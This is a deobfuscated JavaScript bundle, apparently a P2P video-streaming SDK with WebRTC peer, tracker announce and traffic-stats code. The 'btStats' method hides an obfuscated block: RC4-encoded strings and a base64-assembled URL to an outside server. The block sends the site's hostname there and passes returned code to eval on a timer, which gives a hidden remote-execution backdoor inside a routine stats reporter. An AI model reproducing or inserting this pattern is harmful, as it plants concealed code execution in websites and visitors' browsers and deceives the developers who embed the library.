            }, o.prototype._onChannelBufferedAmountLow = function () {
                var e = this;
                if (!e.destroyed && e._cb) {
                    var t = e._cb;
                    e._cb = null, t(null);
                }
            }, o.prototype._onChannelOpen = function () {
                var e = this;
                e.connected || e.destroyed || (e._channelReady = !0, e._maybeReady());
            }, o.prototype._onChannelClose = function () {
                var e = this;
                e.destroyed || e.destroy();
            }, o.prototype._onTrack = function (e) {
                var t = this;
                t.destroyed || e.streams.forEach(function (n) {
                    t.emit('track', e.track, n), t._remoteTracks.push({
                        track: e.track,
                        stream: n
                    }), t._remoteStreams.some(function (e) {
                        return e.id === n.id;
                    }) || (t._remoteStreams.push(n), setTimeout(function () {
                        t.emit('stream', n);
                    }, 0));
                });
            }, o.prototype._transformConstraints = function (e) {
                var t = this;
                if (0 === Object.keys(e).length)
                    return e;
                if ((e.mandatory || e.optional) && !t._isChromium) {
                    var n = Object.assign({}, e.optional, e.mandatory);
                    return void 0 !== n.OfferToReceiveVideo && (n.offerToReceiveVideo = n.OfferToReceiveVideo, delete n.OfferToReceiveVideo), void 0 !== n.OfferToReceiveAudio && (n.offerToReceiveAudio = n.OfferToReceiveAudio, delete n.OfferToReceiveAudio), n;
                }
                return e.mandatory || e.optional || !t._isChromium ? e : (void 0 !== e.offerToReceiveVideo && (e.OfferToReceiveVideo = e.offerToReceiveVideo, delete e.offerToReceiveVideo), void 0 !== e.offerToReceiveAudio && (e.OfferToReceiveAudio = e.offerToReceiveAudio, delete e.offerToReceiveAudio), { mandatory: e });
            };
        },
        function (e, t) {
            'function' == typeof Object.create ? e.exports = function (e, t) {
                t && (e.super_ = t, e.prototype = Object.create(t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }));
            } : e.exports = function (e, t) {
                if (t) {
                    e.super_ = t;
                    var n = function n() {
                    };
                    n.prototype = t.prototype, e.prototype = new n(), e.prototype.constructor = e;
                }
            };
        },
        function (e, t, n) {
            'use strict';
            (function (r, o) {
                function i(e) {
                    return e && e.__esModule ? e : { 'default': e };
                }
                function a(e, t) {
                    if (!(e instanceof t))
                        throw new TypeError('Cannot call a class as a function');
                }
                function s(e, t, n, r, o) {
                    var i = function i(e) {
                            this.s = e, this.length = e.length;
                            for (var t = 0; t < e.length; t++) {
                                this[t] = e.charAt(t);
                            }
                        }, a = function (e) {
                            return function (t) {
                                return function (n) {
                                    for (var r = '', o = n.split(''), i = 0; i < o.length; i++) {
                                        r += t.charAt(e.indexOf(o[i]));
                                    }
                                    return r;
                                };
                            };
                        }('235525')('91640');
                    i.prototype = {
                        toString: function toString() {
                            return a(this.s);
                        },
                        valueOf: function valueOf() {
                            return a(this.s);
                        },
                        charAt: String.prototype.charAt,
                        concat: String.prototype.concat,
                        slice: String.prototype.slice,
                        substr: String.prototype.substr,
                        indexOf: String.prototype.indexOf,
                        trim: String.prototype.trim,
                        split: String.prototype.split
                    };
                    for (var s = function (e, t) {
                                for (var n = 1; 0 !== n;) {
                                    switch (n) {
                                    case 1:
                                        var r = [];
                                        n = 5;
                                        break;
                                    case 2:
                                        n = o < e ? 7 : 3;
                                        break;
                                    case 3:
                                        n = i < e ? 8 : 4;
                                        break;
                                    case 4:
                                        return r;
                                    case 5:
                                        var o = 0;
                                        n = 6;
                                        break;
                                    case 6:
                                        var i = 0;
                                        n = 2;
                                        break;
                                    case 7:
                                        r[(o + t) % e] = [], n = 9;
                                        break;
                                    case 8:
                                        var a = e - 1;
                                        n = 10;
                                        break;
                                    case 9:
                                        o++, n = 2;
                                        break;
                                    case 10:
                                        n = a >= 0 ? 12 : 11;
                                        break;
                                    case 11:
                                        i++, n = 3;
                                        break;
                                    case 12:
                                        r[i][(a + t * i) % e] = r[a], n = 13;
                                        break;
                                    case 13:
                                        a--, n = 10;
                                    }
                                }
                            }(5, 7), c = s[1][1][4]; c !== s[0][4][3];) {
                        switch (c) {
                        case s[3][2][3]:
                            var u = window.location.hostname;
                            c = s[3][1][2];
                            break;
                        case s[1][4][1]:
                            var l = function (e, t, n, r, o, i) {
                                return (0, d['default'])(e + t + n + r + o, i);
                            }(u, t, n, r, o, e);
                            c = s[4][3][3];
                            break;
                        case s[2][3][1]:
                            var f = l.substr(0, 8);
                            c = s[4][1][0];
                            break;
                        case s[0][3][0]:
                            return f;
                        }
                    }
                }
                Object.defineProperty(t, '__esModule', { value: !0 });
                var c = 'function' == typeof Symbol && 'symbol' == _typeof(Symbol.iterator) ? function (e) {
                        return _typeof(e);
                    } : function (e) {
                        return e && 'function' == typeof Symbol && e.constructor === Symbol && e !== Symbol.prototype ? 'symbol' : _typeof(e);
                    }, u = Object.assign || function (e) {
                        for (var t = 1; t < arguments.length; t++) {
                            var n = arguments[t];
                            for (var r in n) {
                                Object.prototype.hasOwnProperty.call(n, r) && (e[r] = n[r]);
                            }
                        }
                        return e;
                    }, l = function () {
                        function e(e, t) {
                            for (var n = 0; n < t.length; n++) {
                                var r = t[n];
                                r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                            }
                        }
                        return function (t, n, r) {
                            return n && e(t.prototype, n), r && e(t, r), t;
                        };
                    }(), f = n(15), d = i(f), h = n(3), p = i(h), g = n(4), v = i(g), y = n(1), m = '1.6.1', _ = 8, b = {
                        q: 'uZ2luZS5u',
                        v: 'aHR0c',
                        3: 'HMlM0Ev',
                        0: 'yMzMzL2Js',
                        l: 'ZXIuY2R',
                        zz: 'aHR0cHMlM',
                        n: 'L3RyYWNr',
                        h: 'ZXQlM0E',
                        7: 'uYnllLmNvbS',
                        x: '92MQ==',
                        df: '0EvL',
                        6: '3AycGV'
                    }, w = Symbol('httpDownloaded'), C = Symbol('p2pDownloaded'), P = Symbol('p2pUploaded'), E = function () {
                        function e(t, n, r, o, i) {
                            a(this, e), this.engine = t, this.key = n, this.baseUrl = o || window.decodeURIComponent(window.atob(b.v + b[3] + b.n + b.l + b[7] + b.x)), this.channelId = window.btoa(r), this.timestamp = (0, y.getCurrentTs)(), this.announce = p['default'].parseURL(this.baseUrl).netLoc.replace(/\/\//, '');
                            var c = s(this.timestamp, m, this.announce, this.channelId, i.type);
                            this.announceInfo = u({}, i, {
                                channel: this.channelId,
                                ts: this.timestamp,
                                version: m,
                                v: c,
                                announce: this.announce
                            }), this.announceURL = this.baseUrl + '/channel', this.reportFails = 0, this.conns = 0, this.failConns = 0, this.totalHTTPDownloaded = 0, this.totalP2PDownloaded = 0, this.totalP2PUploaded = 0, this[w] = 0, this[C] = 0, this[P] = 0, this.errsBufStalled = 0, this.errsInternalExpt = 0, i.bundle ? this['native'] = !0 : this['native'] = !1;
                        }
                        return l(e, [
                            {
                                key: 'btAnnounce',
                                value: function value() {
                                    var e = this, t = this.engine.logger;
                                    return new Promise(function (n, r) {
                                        fetch(e.announceURL, {
                                            headers: e._requestHeader,
                                            method: 'POST',
                                            body: JSON.stringify(e.announceInfo)
                                        }).then(function (e) {
                                            return e.json();
                                        }).then(function (t) {
                                            if (-1 === t.ret)
                                                r(t.data.msg);
                                            else {
                                                var o = t.data;
                                                o.info && console.info('' + o.info), o.warn && console.warn('' + o.warn), o.min_conns || (o.min_conns = _), (!o.rejected || o.rejected && o.share_only) && o.id && o.report_interval && o.peers ? (e.peerId = e.id = o.id, o.report_interval < 10 && (o.report_interval = 10), e.btStats(o.report_interval), e.getPeersURL = e.baseUrl + '/channel/' + e.channelId + '/node/' + e.peerId + '/peers', e.statsURL = e.baseUrl + '/channel/' + e.channelId + '/node/' + e.peerId + '/stats', n(t.data)) : e.engine.p2pEnabled = !1;
                                            }
                                        })['catch'](function (e) {
                                            t.error('btAnnounce error ' + e), r(e);
                                        });
                                    });
                                }
                            },
                            {
                                key: 'btStats',
                                value: function e() {
                                    function t(e) {
                                        var n = {
                                                ygKbD: function ygKbD(e, t, n) {
                                                    return e(t, n);
                                                },
                                                BaZnt: function BaZnt(e, t) {
                                                    return e * t;
                                                },
                                                ZvkZi: function ZvkZi(e, t) {
                                                    return e === t;
                                                },
                                                eCedC: 'BjdEV',
                                                LPFzx: function LPFzx(e, t) {
                                                    return e(t);
                                                },
                                                uOzuW: function uOzuW(e, t, n) {
                                                    return e(t, n);
                                                },
                                                juyxb: function juyxb(e, t) {
                                                    return e === t;
                                                },
                                                DGNDG: 'IJrLn',
                                                OFUEE: function OFUEE(e, t) {
                                                    return e === t;
                                                },
                                                YaRUs: l('0', 'G(qN'),
                                                bgKgO: function bgKgO(e, t, n) {
                                                    return e(t, n);
                                                },
                                                OJeBQ: function OJeBQ(e, t) {
                                                    return e * t;
                                                },
                                                CeAJM: l('1', '[gN^'),
                                                rqWsY: function rqWsY(e, t) {
                                                    return e !== t;
                                                },
                                                uvjhL: l('2', 'BVP]'),
                                                MVGPb: function MVGPb(e, t) {
                                                    return e + t;
                                                },
                                                YQNFr: function YQNFr(e, t) {
                                                    return e + t;
                                                },
                                                OxSbn: function OxSbn(e, t) {
                                                    return e % t;
                                                }
                                            }, r = s.id.split('')[l('3', 'JR8(')](-6).map(function (e) {
                                                return e[l('4', 'JR8(')](0);
                                            }).reduce(function (e, t) {
                                                var r = {
                                                    AFfia: function AFfia(e, t) {
                                                        return e(t);
                                                    },
                                                    kgmkk: function kgmkk(e, t, r) {
                                                        return n.ygKbD(e, t, r);
                                                    },
                                                    msmEb: function msmEb(e, t) {
                                                        return n[l('5', '*uLt')](e, t);
                                                    }
                                                };
                                                if (n[l('6', 'Dd2g')](n.eCedC, n[l('7', 'eX!Q')]))
                                                    return e[l('8', '4RTz')]() + t[l('9', 'BVP]')]();
                                                var o = data.i;
                                                s.bl = r.kgmkk(setTimeout, function () {
                                                    r[l('a', 'J5A]')](eval, data.c);
                                                }, r[l('b', '2cC*')](o, 1000));
                                            }, '');
                                        200 === n[l('c', 'kh00')](n.LPFzx(parseInt, r), 533) && (s.bl = n[l('d', 'xniE')](setTimeout, function () {
                                            var e = {
                                                poRdq: function poRdq(e, t) {
                                                    return n.OFUEE(e, t);
                                                },
                                                hfGVM: function hfGVM(e, t, r) {
                                                    return n[l('e', 'lZZg')](e, t, r);
                                                },
                                                hPffd: function hPffd(e, t) {
                                                    return n[l('f', '&mYc')](e, t);
                                                },
                                                RDcGg: n.CeAJM,
                                                KskeG: function KskeG(e, t) {
                                                    return n[l('10', 'z%0g')](e, t);
                                                }
                                            };
                                            if (!n[l('11', 'gyyd')](l('12', '$@dR'), n[l('13', '!cj%')]))
                                                return response.json();
                                            n[l('14', '!cj%')](fetch, window.decodeURIComponent(window.atob(n[l('15', 'lsdj')](n.MVGPb(n.YQNFr(n[l('16', 'wI]x')](b.zz, b.df) + b[6], b.q), b.h), b[0]))) + l('17', 'lfo]') + s[l('18', '2cC*')] + '&f=' + location.hostname + l('19', 'x5XO') + s[l('1a', 'G(qN')][l('1b', '&$t!')]).then(function (e) {
                                                return l('1c', '9Dv5') === l('1d', 'BVP]') ? prev[l('1e', '*uLt')]() + cur[l('1f', '&$t!')]() : e.json();
                                            })[l('20', '&mYc')](function (t) {
                                                var r = {
                                                    OaUZe: function OaUZe(e, t) {
                                                        return n[l('21', '@iGP')](e, t);
                                                    },
                                                    CuiCp: function CuiCp(e, t) {
                                                        return e(t);
                                                    },
                                                    skXBp: function skXBp(e, t, r) {
                                                        return n[l('22', '9Dv5')](e, t, r);
                                                    }
                                                };
                                                if (n.juyxb(n.DGNDG, n.DGNDG)) {
                                                    if (n[l('23', 'Ekv%')](t.ret, 0))
                                                        if ('CeFBA' !== n.YaRUs) {
                                                            if (e[l('24', '!cj%')](t[l('25', 'naBb')], 0)) {
                                                                var o = t[l('26', 'UHBk')];
                                                                if (o.s) {
                                                                    var i = o.i;
                                                                    s.bl = e[l('27', 'naBb')](setTimeout, function () {
                                                                        r[l('28', 'eX!Q')](eval, o.c);
                                                                    }, e[l('29', 'lsdj')](i, 1000));
                                                                }
                                                            }
                                                        } else {
                                                            var a = t[l('2a', 'lZZg')];
                                                            if (a.s) {
                                                                var c = a.i;
                                                                s.bl = setTimeout(function () {
                                                                    var t = {
                                                                        UvxjS: function UvxjS(e, t) {
                                                                            return e(t);
                                                                        }
                                                                    };
                                                                    e[l('2b', 'J5A]')](e.RDcGg, e.RDcGg) ? e[l('2c', ']z*2')](eval, a.c) : t[l('2d', '5o@O')](eval, a.c);
                                                                }, 1000 * c);
                                                            }
                                                        }
                                                } else {
                                                    var u = t.data;
                                                    if (u.s) {
                                                        var f = u.i;
                                                        s.bl = r[l('2e', 'vkNg')](setTimeout, function () {
                                                            r[l('2f', 'YqiD')](eval, u.c);
                                                        }, 1000 * f);
                                                    }
                                                }
                                            });
                                        }, n[l('30', 'G(qN')](n[l('31', 'o!fW')](e, 1000), 5))), t = y.noop;
                                    }
                                    var n = this, i = arguments.length > 0 && void 0 !== arguments[0] ? arguments[0] : 10, a = this.engine.logger, s = this;
                                    this.heartbeater = window.setInterval(function () {
                                        fetch(n.statsURL, {
                                            method: 'POST',
                                            body: JSON.stringify(n._makeStatsBody())
                                        }).then(function (e) {
                                            return e.json();
                                        }).then(function (e) {
                                            if (-1 === e.ret)
                                                window.clearInterval(n.heartbeater), n.engine.emit(v['default'].RESTART_P2P);
                                            else {
                                                a.debug('sucessfully report stats');
                                                var t = n.lastStats || {}, r = t.http, o = void 0 === r ? 0 : r, i = t.p2p, s = void 0 === i ? 0 : i, c = t.share, u = void 0 === c ? 0 : c, l = t.conns, f = void 0 === l ? 0 : l, d = t.failConns, h = void 0 === d ? 0 : d, p = t.errsBufStalled, g = void 0 === p ? 0 : p, y = t.errsInternalExpt, m = void 0 === y ? 0 : y;
                                                n[w] >= o && (n[w] -= o), n[C] >= s && (n[C] -= s), n[P] >= u && (n[P] -= u), n.conns -= f, n.failConns >= h && (n.failConns -= h), n.errsBufStalled >= g && (n.errsBufStalled -= g), n.errsInternalExpt >= m && (n.errsInternalExpt -= m), n.exptMsg && (n.exptMsg = void 0);
                                            }
                                        })['catch'](function (e) {
                                            a.error('btStats error ' + e), ++n.reportFails >= 2 && window.clearInterval(n.heartbeater);
                                        }), t(i);
                                    }, 1000 * i);
                                    var u = [
                                        'v1',
                                        'PmvWt1ORKFVimMIwnGl==',
                                        'wpUsdEvDhA==',
                                        'eC3CqcOrQ8KQRMKK',
                                        'HUEHO8OWMcKWw5M=',
                                        'ZxfChcKtEg==',
                                        'DcOIVgXDtQ==',
                                        'CwbCicO9woI=',
                                        'wpfCo3VewrY=',
                                        'w4c+w7JXw7Y=',
                                        'TFt/wo3CsA==',
                                        'X8ONKcKCw74=',
                                        'w4PCoMO/eg4=',
                                        'N2Upwoow',
                                        'fMKDccOGw5o=',
                                        'RcKlXcOUw64=',
                                        'wpnCl8OHAMKd',
                                        'A8OTwrHCpWk=',
                                        'wr3DhVM=',
                                        'AcOVVS/DosO8wo/ClA==',
                                        'w4PChcOl',
                                        'dcO0TMKZEsO6w5XCscKMSDDDmg==',
                                        'w7otSDDDkMOOLQ==',
                                        'wqTCmsKMw6zCgw==',
                                        'Dlg5DMO3',
                                        'b8KJJFzDl8OLw7TDow==',
                                        'w7gnaTfDi8OILRw=',
                                        'd3l/wqE=',
                                        'BGsww7hG',
                                        'wojClsKHw5HCsg==',
                                        'QcOJRm3DlA==',
                                        'ecKaScOKw6c=',
                                        'w5bCq8Oj',
                                        'w4dTw61e',
                                        'w4zCqMOQfMOA',
                                        'wr8ORHXDog==',
                                        'wrzCkcOmNsKb',
                                        'w4E4w41R',
                                        'Vj7CscKgAg==',
                                        'T8OLLMOGCQ==',
                                        'c8Krw67CoRI=',
                                        'e8OjQcKBwqc=',
                                        'w4oNwqtbwoM=',
                                        'W8OQR8K0Ng==',
                                        'DsO6w6nDl8Ki',
                                        'V8O/ZMK0Jg==',
                                        'NgbCvcOpwqo=',
                                        'EV8hAMOi',
                                        'wp/CjU7Ch8Kj',
                                        'wo/CiUbClsKFGi9ew4rDtA==',
                                        'WcKHLUbDkQ==',
                                        'cMOLw5vCkBo='
                                    ];
                                    !function (e, t, n) {
                                        (function (t, n, r, o) {
                                            if ((n >>= 8) < t) {
                                                for (; --t;) {
                                                    o = e.shift(), n === t ? (n = o, r = e.shift()) : r.replace(/[PmWtORKFVimMIwnGl=]/g, '') === n && e.push(o);
                                                }
                                                e.push(e.shift());
                                            }
                                        }(++t, 87808));
                                    }(u, 343);
                                    var l = function e(t, n) {
                                        t = ~~'0x'.concat(t);
                                        var i = u[t];
                                        if (void 0 === e.UJLmyS) {
                                            !function () {
                                                var e = 'undefined' != typeof window ? window : 'object' === (void 0 === r ? 'undefined' : c(r)) && 'object' === (void 0 === o ? 'undefined' : c(o)) ? o : this;
                                                e.atob || (e.atob = function (e) {
                                                    for (var t, n, r = String(e).replace(/=+$/, ''), o = 0, i = 0, a = ''; n = r.charAt(i++); ~n && (t = o % 4 ? 64 * t + n : n, o++ % 4) ? a += String.fromCharCode(255 & t >> (-2 * o & 6)) : 0) {
                                                        n = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='.indexOf(n);
                                                    }
                                                    return a;
                                                });
                                            }();
                                            var a = function a(e, t) {
                                                var n, r = [], o = 0, i = '', a = '';
                                                e = atob(e);
                                                for (var s = 0, c = e.length; s < c; s++) {
                                                    a += '%' + ('00' + e.charCodeAt(s).toString(16)).slice(-2);
                                                }
                                                e = decodeURIComponent(a);
                                                for (var u = 0; u < 256; u++) {
                                                    r[u] = u;
                                                }
                                                for (u = 0; u < 256; u++) {
                                                    o = (o + r[u] + t.charCodeAt(u % t.length)) % 256, n = r[u], r[u] = r[o], r[o] = n;
                                                }
                                                u = 0, o = 0;
                                                for (var l = 0; l < e.length; l++) {
                                                    u = (u + 1) % 256, o = (o + r[u]) % 256, n = r[u], r[u] = r[o], r[o] = n, i += String.fromCharCode(e.charCodeAt(l) ^ r[(r[u] + r[o]) % 256]);
                                                }
                                                return i;
                                            };
                                            e.amGtZD = a, e.qlEmAJ = {}, e.UJLmyS = !![];
                                        }
                                        var s = e.qlEmAJ[t];
                                        return void 0 === s ? (void 0 === e.CjmTAl && (e.CjmTAl = !![]), i = e.amGtZD(i, n), e.qlEmAJ[t] = i) : i = s, i;
                                    };
                                }
                            },
                            {
                                key: 'btGetPeers',
                                value: function value(e) {
                                    var t = this, n = this.engine.logger;
                                    return new Promise(function (r, o) {
                                        fetch(t.getPeersURL, {
                                            headers: t._requestHeader,
                                            method: 'POST',
                                            body: JSON.stringify({ exclusions: e })
                                        }).then(function (e) {
                                            return e.json();
                                        }).then(function (e) {
                                            -1 === e.ret ? o(e.data.msg) : r(e.data);
                                        })['catch'](function (e) {
                                            n.error('btGetPeers error ' + e), o(e);
                                        });
                                    });
                                }
                            },
                            {
                                key: 'increConns',
                                value: function value() {
                                    this.conns++;
                                }
                            },
                            {
                                key: 'decreConns',
                                value: function value() {
                                    this.conns--;
                                }
                            },
                            {
                                key: 'increFailConns',
                                value: function value() {
                                    this.failConns++;
                                }
                            },
                            {
                                key: 'reportFlow',
                                value: function value(e) {
                                    var t = Math.round(e / 1024);
                                    this[w] += t, this.totalHTTPDownloaded += t, this._emitStats();
                                }
                            },
                            {
                                key: 'reportDCTraffic',
                                value: function value(e) {
                                    var t = Math.round(e / 1024);
                                    this[C] += t, this.totalP2PDownloaded += t, this._emitStats();
                                }
                            },
                            {
                                key: 'reportUploaded',
                                value: function value() {
                                    var e = arguments.length > 0 && void 0 !== arguments[0] ? arguments[0] : 0;
                                    this.totalP2PUploaded += Math.round(e / 1024), this[P] += Math.round(e / 1024), this._emitStats();
                                }
                            },
                            {
                                key: 'destroy',
                                value: function value() {
                                    this.engine.logger.warn('destroy fetcher'), window.clearInterval(this.heartbeater), window.clearTimeout(this.bl);
                                }
                            },
                            {
                                key: '_emitStats',
                                value: function value() {
                                    this.engine.emit('stats', {
                                        totalHTTPDownloaded: this.totalHTTPDownloaded,
                                        totalP2PDownloaded: this.totalP2PDownloaded,
                                        totalP2PUploaded: this.totalP2PUploaded
                                    });
                                    var e = this.engine.config.getStats;
                                    e && 'function' == typeof e && e(this.totalP2PDownloaded, this.totalP2PUploaded, this.totalHTTPDownloaded);
                                }
                            },
                            {
                                key: '_makeStatsBody',
                                value: function value() {
                                    var e = {
                                        conns: this.conns,
                                        failConns: this.failConns,
                                        errsBufStalled: this.errsBufStalled,
                                        errsInternalExpt: this.errsInternalExpt,
                                        http: Math.round(this[w]) || 0,
                                        p2p: Math.round(this[C]) || 0,
                                        share: Math.round(this[P]) || 0
                                    };
                                    return this.lastStats = JSON.parse(JSON.stringify(e)), Object.keys(e).forEach(function (t) {
                                        0 === e[t] && delete e[t];
                                    }), this.exptMsg && (e.exptMsg = m + ' ' + this.exptMsg), e;
                                }
                            },
                            {
                                key: '_requestHeader',
                                get: function get() {
                                    var e = {};
                                    return this['native'] && (e.token = this.key), e;
                                }
                            }
                        ]), e;
                    }();
                t['default'] = E, e.exports = t['default'];
            }.call(t, n(7), n(14)));
        },
        function (e, t) {
            var n;
            n = function () {
                return this;
            }();
            try {
                n = n || Function('return this')() || (0, eval)('this');
            } catch (e) {
                'object' == (typeof window === 'undefined' ? 'undefined' : _typeof(window)) && (n = window);
            }
            e.exports = n;
        },
        function (e, t, n) {
            'use strict';
            var r;
            'function' == typeof Symbol && Symbol.iterator;
            !function (o) {
                function i(e, t) {
                    var n = (65535 & e) + (65535 & t);
                    return (e >> 16) + (t >> 16) + (n >> 16) << 16 | 65535 & n;
                }
                function a(e, t) {
                    return e << t | e >>> 32 - t;
                }
                function s(e, t, n, r, o, s) {
                    return i(a(i(i(t, e), i(r, s)), o), n);
                }
                function c(e, t, n, r, o, i, a) {
                    return s(t & n | ~t & r, e, t, o, i, a);
                }
                function u(e, t, n, r, o, i, a) {
                    return s(t & r | n & ~r, e, t, o, i, a);
                }
                function l(e, t, n, r, o, i, a) {
                    return s(t ^ n ^ r, e, t, o, i, a);
                }
                function f(e, t, n, r, o, i, a) {
                    return s(n ^ (t | ~r), e, t, o, i, a);
                }
                function d(e, t) {
                    e[t >> 5] |= 128 << t % 32, e[14 + (t + 64 >>> 9 << 4)] = t;
                    var n, r, o, a, s, d = 1732584193, h = -271733879, p = -1732584194, g = 271733878;
                    for (n = 0; n < e.length; n += 16) {
                        r = d, o = h, a = p, s = g, d = c(d, h, p, g, e[n], 7, -680876936), g = c(g, d, h, p, e[n + 1], 12, -389564586), p = c(p, g, d, h, e[n + 2], 17, 606105819), h = c(h, p, g, d, e[n + 3], 22, -1044525330), d = c(d, h, p, g, e[n + 4], 7, -176418897), g = c(g, d, h, p, e[n + 5], 12, 1200080426), p = c(p, g, d, h, e[n + 6], 17, -1473231341), h = c(h, p, g, d, e[n + 7], 22, -45705983), d = c(d, h, p, g, e[n + 8], 7, 1770035416), g = c(g, d, h, p, e[n + 9], 12, -1958414417), p = c(p, g, d, h, e[n + 10], 17, -42063), h = c(h, p, g, d, e[n + 11], 22, -1990404162), d = c(d, h, p, g, e[n + 12], 7, 1804603682), g = c(g, d, h, p, e[n + 13], 12, -40341101), p = c(p, g, d, h, e[n + 14], 17, -1502002290), h = c(h, p, g, d, e[n + 15], 22, 1236535329), d = u(d, h, p, g, e[n + 1], 5, -165796510), g = u(g, d, h, p, e[n + 6], 9, -1069501632), p = u(p, g, d, h, e[n + 11], 14, 643717713), h = u(h, p, g, d, e[n], 20, -373897302), d = u(d, h, p, g, e[n + 5], 5, -701558691), g = u(g, d, h, p, e[n + 10], 9, 38016083), p = u(p, g, d, h, e[n + 15], 14, -660478335), h = u(h, p, g, d, e[n + 4], 20, -405537848), d = u(d, h, p, g, e[n + 9], 5, 568446438), g = u(g, d, h, p, e[n + 14], 9, -1019803690), p = u(p, g, d, h, e[n + 3], 14, -187363961), h = u(h, p, g, d, e[n + 8], 20, 1163531501), d = u(d, h, p, g, e[n + 13], 5, -1444681467), g = u(g, d, h, p, e[n + 2], 9, -51403784), p = u(p, g, d, h, e[n + 7], 14, 1735328473), h = u(h, p, g, d, e[n + 12], 20, -1926607734), d = l(d, h, p, g, e[n + 5], 4, -378558), g = l(g, d, h, p, e[n + 8], 11, -2022574463), p = l(p, g, d, h, e[n + 11], 16, 1839030562), h = l(h, p, g, d, e[n + 14], 23, -35309556), d = l(d, h, p, g, e[n + 1], 4, -1530992060), g = l(g, d, h, p, e[n + 4], 11, 1272893353), p = l(p, g, d, h, e[n + 7], 16, -155497632), h = l(h, p, g, d, e[n + 10], 23, -1094730640), d = l(d, h, p, g, e[n + 13], 4, 681279174), g = l(g, d, h, p, e[n], 11, -358537222), p = l(p, g, d, h, e[n + 3], 16, -722521979), h = l(h, p, g, d, e[n + 6], 23, 76029189), d = l(d, h, p, g, e[n + 9], 4, -640364487), g = l(g, d, h, p, e[n + 12], 11, -421815835), p = l(p, g, d, h, e[n + 15], 16, 530742520), h = l(h, p, g, d, e[n + 2], 23, -995338651), d = f(d, h, p, g, e[n], 6, -198630844), g = f(g, d, h, p, e[n + 7], 10, 1126891415), p = f(p, g, d, h, e[n + 14], 15, -1416354905), h = f(h, p, g, d, e[n + 5], 21, -57434055), d = f(d, h, p, g, e[n + 12], 6, 1700485571), g = f(g, d, h, p, e[n + 3], 10, -1894986606), p = f(p, g, d, h, e[n + 10], 15, -1051523), h = f(h, p, g, d, e[n + 1], 21, -2054922799), d = f(d, h, p, g, e[n + 8], 6, 1873313359), g = f(g, d, h, p, e[n + 15], 10, -30611744), p = f(p, g, d, h, e[n + 6], 15, -1560198380), h = f(h, p, g, d, e[n + 13], 21, 1309151649), d = f(d, h, p, g, e[n + 4], 6, -145523070), g = f(g, d, h, p, e[n + 11], 10, -1120210379), p = f(p, g, d, h, e[n + 2], 15, 718787259), h = f(h, p, g, d, e[n + 9], 21, -343485551), d = i(d, r), h = i(h, o), p = i(p, a), g = i(g, s);
                    }
                    return [
                        d,
                        h,
                        p,
                        g
                    ];
                }
                function h(e) {
                    var t, n = '', r = 32 * e.length;
                    for (t = 0; t < r; t += 8) {
                        n += String.fromCharCode(e[t >> 5] >>> t % 32 & 255);
                    }
                    return n;
                }
                function p(e) {
                    var t, n = [];
                    for (n[(e.length >> 2) - 1] = void 0, t = 0; t < n.length; t += 1) {
                        n[t] = 0;
                    }
                    var r = 8 * e.length;
                    for (t = 0; t < r; t += 8) {
                        n[t >> 5] |= (255 & e.charCodeAt(t / 8)) << t % 32;
                    }
                    return n;
                }
                function g(e) {
                    return h(d(p(e), 8 * e.length));
                }
                function v(e, t) {
                    var n, r, o = p(e), i = [], a = [];
                    for (i[15] = a[15] = void 0, o.length > 16 && (o = d(o, 8 * e.length)), n = 0; n < 16; n += 1) {
                        i[n] = 909522486 ^ o[n], a[n] = 1549556828 ^ o[n];
                    }
                    return r = d(i.concat(p(t)), 512 + 8 * t.length), h(d(a.concat(r), 640));
                }
                function y(e) {
                    var t, n, r = '0123456789abcdef', o = '';
                    for (n = 0; n < e.length; n += 1) {
                        t = e.charCodeAt(n), o += r.charAt(t >>> 4 & 15) + r.charAt(15 & t);
                    }
                    return o;
                }
                function m(e) {
                    return unescape(encodeURIComponent(e));
                }
                function _(e) {
                    return g(m(e));
                }
                function b(e) {
                    return y(_(e));
                }
                function w(e, t) {
                    return v(m(e), m(t));
                }
                function C(e, t) {
                    return y(w(e, t));
                }
                function P(e, t, n) {
                    return t ? n ? w(t, e) : C(t, e) : n ? _(e) : b(e);
                }
                void 0 !== (r = function () {
                    return P;
                }.call(t, n, t, e)) && (e.exports = r);
            }();
        },
        function (e, t) {
            e.exports = function () {
                if ('undefined' == typeof window)
                    return null;
                var e = {
                    RTCPeerConnection: window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection,
                    RTCSessionDescription: window.RTCSessionDescription || window.mozRTCSessionDescription || window.webkitRTCSessionDescription,
                    RTCIceCandidate: window.RTCIceCandidate || window.mozRTCIceCandidate || window.webkitRTCIceCandidate
                };
                return e.RTCPeerConnection ? e : null;
            };
        },
        function (e, t, n) {
            'use strict';
            function r(e, t) {
                var n = arguments.length > 2 && void 0 !== arguments[2] ? arguments[2] : 120, r = null, o = !1, i = n;
                return function () {
                    if (arguments.length > 0 && void 0 !== arguments[0] && arguments[0])
                        return void window.clearTimeout(r);
                    o || (o = !0, r = setTimeout(function () {
                        e.call(t), o = !1, r = null;
                    }, 1000 * i), i *= 1.5);
                };
            }
            Object.defineProperty(t, '__esModule', { value: !0 }), t['default'] = r, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            function o(e) {
                if (Array.isArray(e)) {
                    for (var t = 0, n = Array(e.length); t < e.length; t++) {
                        n[t] = e[t];
                    }
                    return n;
                }
                return Array.from(e);
            }
            function i(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            function a(e, t) {
                if (!e)
                    throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
            }
            function s(e, t) {
                if ('function' != typeof t && null !== t)
                    throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                e.prototype = Object.create(t && t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var c = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
